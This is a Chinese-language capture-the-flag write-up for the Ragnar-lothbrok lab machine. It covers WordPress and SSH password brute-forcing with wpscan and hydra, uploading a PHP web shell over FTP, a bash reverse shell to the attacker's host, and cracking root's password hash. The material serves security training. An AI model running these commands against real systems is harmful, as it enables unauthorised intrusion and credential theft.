Ragnar-lothbrok 靶机

Ragnar-lothbrok

信息搜集

存活检测

Ragnar-lothbrok 靶机_第1张图片

详细扫描

Ragnar-lothbrok 靶机_第2张图片

后台网页扫描

Ragnar-lothbrok 靶机_第3张图片

网站信息搜集

  • secret “秘密”网页

    Ragnar-lothbrok 靶机_第4张图片

    将密文保存到 password.txt

  • 此页面使用了 wordpress CMS

    Ragnar-lothbrok 靶机_第5张图片

  • 疑似用户 ragnar

    Ragnar-lothbrok 靶机_第6张图片

  • wpscan 也爆破出了用户 ragnar

    wpscan --url http://10.4.7.155/wordpress/ --enumerate u 
    

    Ragnar-lothbrok 靶机_第7张图片

密码获取

  • 尝试利用搜集的用户名和密码爆破网站、ftp、ssh 密码

尝试网页登录爆破

wpscan --url http://10.4.7.155/wordpress/ --usernames ragnar --passwords password.txt

爆破出密码 ubbe

Ragnar-lothbrok 靶机_第8张图片

ssh 爆破

hydra -l ragnar -P password.txt ssh://10.4.7.155

ragnar 密码为 lagertha

Ragnar-lothbrok 靶机_第9张图片

漏洞利用

  • 查看 ftp 中有用的信息

    Ragnar-lothbrok 靶机_第10张图片

  • 未搜集到有用信息

  • 网页登录

    10.4.7.155/wordpress/wp-login.php
    
    ragnar
    ubbe
    

    Ragnar-lothbrok 靶机_第11张图片

    卡的登不上去

    Ragnar-lothbrok 靶机_第12张图片

  • 直接尝试 ftp 上传一句话木马

    Ragnar-lothbrok 靶机_第13张图片

    put shell.php
    

    成功上传

    Ragnar-lothbrok 靶机_第14张图片

  • 蚁剑连接,发现可以连接

    Ragnar-lothbrok 靶机_第15张图片

  • 打开蚁剑中虚拟终端,反弹进 kali

    bash -c 'bash -i >& /dev/tcp/10.4.7.146/7777 0>&1'
    

    Ragnar-lothbrok 靶机_第16张图片

    成功反弹

提权

  • 信息搜集

    切换到 home 目录,发现有用户 ragnar

    Ragnar-lothbrok 靶机_第17张图片

  • 尝试使用其 web 和 ftp 密码登录

    密码未 ftp 登陆密码 lagertha

    Ragnar-lothbrok 靶机_第18张图片

  • 查找敏感文件

    在 秘密 文件中可以直接看到 root 加密后的密码

    Ragnar-lothbrok 靶机_第19张图片

  • john 爆破

  • 切换 root

    成功提权

    image-20231026091720785

    Ragnar-lothbrok 靶机_第20张图片

你可能感兴趣的:(渗透测试,web安全,网络安全,服务器)